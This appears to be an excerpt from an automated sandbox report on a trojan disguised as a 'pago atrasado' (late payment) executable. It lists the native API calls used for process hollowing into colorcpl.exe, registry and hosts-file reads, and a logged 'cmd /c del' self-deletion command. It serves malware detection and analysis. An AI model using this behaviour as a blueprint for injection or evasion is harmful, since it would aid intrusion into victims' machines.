          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B02D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1BD45
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0453B150 appears 32 times
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: String function: 009CB150 appears 35 times
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004185CA NtCreateFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_0041867A NtReadFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_004186FB NtClose,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09A10 NtQuerySection,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09560 NtWriteFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0A770 NtOpenThread,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_00418700 NtClose,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_1_004187B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579560 NtWriteFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B18680 NtReadFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B187B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B18700 NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B185D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B186FB NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1867A NtReadFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B185CA NtCreateFile,
          Source: pago atrasado.exe, 00000000.00000003.244765966.000000000F1B6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
          Source: pago atrasado.exe, 00000001.00000003.248962710.0000000000786000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
          Source: pago atrasado.exe, 00000001.00000002.327286991.0000000002973000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs pago atrasado.exe
          Source: C:\Users\user\Desktop\pago atrasado.exeFile read: C:\Users\user\Desktop\pago atrasado.exeJump to behavior
          Source: pago atrasado.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\pago atrasado.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Users\user\Desktop\pago atrasado.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\pago atrasado.exeFile created: C:\Users\user\AppData\Local\Temp\nsb7E27.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@12/5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\pago atrasado.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts